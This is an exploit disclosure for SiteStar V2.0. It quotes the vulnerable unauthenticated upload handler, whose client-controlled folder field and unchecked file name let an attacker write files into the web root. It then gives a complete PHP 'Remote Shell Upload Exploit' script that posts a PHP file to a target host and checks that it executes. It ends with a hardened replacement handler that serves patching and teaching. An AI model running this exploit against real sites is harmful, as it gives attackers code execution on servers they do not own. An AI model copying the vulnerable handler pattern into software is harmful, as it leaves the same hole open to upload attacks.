Vulnerable program: SiteStar (建站之星)
Vulnerability author: cnryan
SiteStar V2.0 does not properly restrict file uploads. A remote attacker can exploit this to upload arbitrary files into the web directory, which ultimately leads to arbitrary command execution on the server.
The vulnerability is in the file /script/multiupload/uploadify.php:
```php
<?php
if (!empty($_FILES)) {
    $tempFile   = $_FILES['Filedata']['tmp_name'];
    // destination directory comes straight from the client-supplied 'folder' field
    $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/';
    // file name is the original client name, no extension check
    $targetFile = str_replace('//', '/', $targetPath) . $_FILES['Filedata']['name'];

    // Work around garbled Chinese file names on Windows
    if (preg_match("/^WIN/i", PHP_OS)) {
        $targetFile = iconv('UTF-8', 'GBK', $targetFile);
    }

    move_uploaded_file($tempFile, $targetFile);
    echo "1";
}
?>
```

Not much to say; this is an elementary mistake. The handler requires no authentication, takes the destination directory from the client-controlled `folder` field (concatenated directly onto `DOCUMENT_ROOT`, so `../` also escapes the intended directory), and writes the file under its original name without any extension check. A crafted HTML form can therefore upload a webshell straight into the web directory. Test code is provided below.

EXP:

```php
<?php
print_r('
+---------------------------------------------------------------------------+
 SiteStar V2.0 Remote Shell Upload Exploit
+---------------------------------------------------------------------------+
');

if ($argc < 3) {
    print "\nUsage: php $argv[0] host path\n";
    print "Example: php $argv[0] localhost /sitestar/\n";
    die();
}

error_reporting(0);
set_time_limit(0);

$host  = $argv[1];
$path  = $argv[2];
// the uploaded file lands under DOCUMENT_ROOT . $path, so it is reachable here
$shell = 'http://' . $host . $path . 'cnryan.php';

// multipart/form-data body: the file part plus the 'folder' field that
// uploadify.php concatenates onto DOCUMENT_ROOT
$payload  = "-----cnryan\r\n";
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"cnryan.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php phpinfo();?>W.S.T\r\n";          // marker W.S.T is used to confirm execution
$payload .= "-----cnryan\r\n";
$payload .= "Content-Disposition: form-data; name=\"upload\"\r\n\r\n";
$payload .= "\r\n";
$payload .= "-----cnryan\r\n";
$payload .= "Content-Disposition: form-data; name=\"folder\"\r\n\r\n";
$payload .= "$path\r\n";
$payload .= "-----cnryan--\r\n";

$packet  = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---cnryan\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n\r\n";
$packet .= $payload;

$fp = fsockopen($host, 80);
if (!$fp) {
    die("Could not connect to {$host}:80\n");
}
fputs($fp, $packet);
sleep(5);
fclose($fp);

// fetch the uploaded file and look for the marker in phpinfo() output
$str = file_get_contents($shell);
if (strpos($str, 'W.S.T') !== false) {
    exit("OK! Got shell:\t$shell\n");
} else {
    exit("Exploit Failed!\n");
}
?>
```
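For comparison, below is a hardened replacement for the handler. This is an added example, not SiteStar's code. It assumes a session flag `$_SESSION['admin']` that the application sets on login, a fixed upload root at `<DOCUMENT_ROOT>/upload`, and that only image uploads are needed; those names and the image-only allowlist are assumptions, not part of the original.

```php
<?php
// Added example, not SiteStar code: a hardened upload handler.
// Assumed names: $_SESSION['admin'] (set by the application's login), an upload root
// at <DOCUMENT_ROOT>/upload, and an image-only allowlist. Needs PHP >= 7.0 for random_bytes().

session_start();

// 1. The original handler had no authentication at all; require a logged-in admin.
if (empty($_SESSION['admin'])) {
    http_response_code(403);
    exit('0');
}

if (empty($_FILES['Filedata']) || $_FILES['Filedata']['error'] !== UPLOAD_ERR_OK) {
    exit('0');
}

// 2. Fixed upload root. realpath() returns false if it does not exist; refuse rather than fall through.
$uploadBase = realpath($_SERVER['DOCUMENT_ROOT'] . '/upload');
if ($uploadBase === false) {
    exit('0');
}

// 3. Never concatenate $_POST['folder'] onto a path. Resolve the requested subfolder and
//    confine it beneath $uploadBase, which defeats "../" and absolute paths.
$folder = isset($_POST['folder']) ? (string) $_POST['folder'] : '';
$target = realpath($uploadBase . '/' . $folder);
if ($target === false
    || strpos($target . DIRECTORY_SEPARATOR, $uploadBase . DIRECTORY_SEPARATOR) !== 0) {
    exit('0');
}

// 4. Extension from an allowlist (lower-cased), so .php, .phtml, .php5 and friends are never written.
$allowedExt  = ['jpg', 'jpeg', 'png', 'gif'];
$allowedMime = ['image/jpeg', 'image/png', 'image/gif'];
$ext = strtolower(pathinfo($_FILES['Filedata']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExt, true)) {
    exit('0');
}

// 5. Check content, not only the name: finfo reads the magic bytes of the temp file and
//    ignores the client-supplied Content-Type of the multipart part.
$finfo = new finfo(FILEINFO_MIME_TYPE);
if (!in_array($finfo->file($_FILES['Filedata']['tmp_name']), $allowedMime, true)) {
    exit('0');
}

// 6. Server-chosen random file name; the client controls neither directory nor name.
$dest = $target . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;

if (!move_uploaded_file($_FILES['Filedata']['tmp_name'], $dest)) {
    exit('0');
}
chmod($dest, 0644);   // no execute bit; additionally disable PHP execution in the upload directory
echo '1';
```

The `echo '1'` / `exit('0')` contract is kept so the Uploadify front-end that posts `Filedata` and `folder` keeps working. Of the six checks, the two that directly kill the exploit above are the extension allowlist (the `.php` name is rejected) and the `realpath` confinement (the `folder` field can no longer pick the web root); the others close the bypasses that usually follow once those are in place.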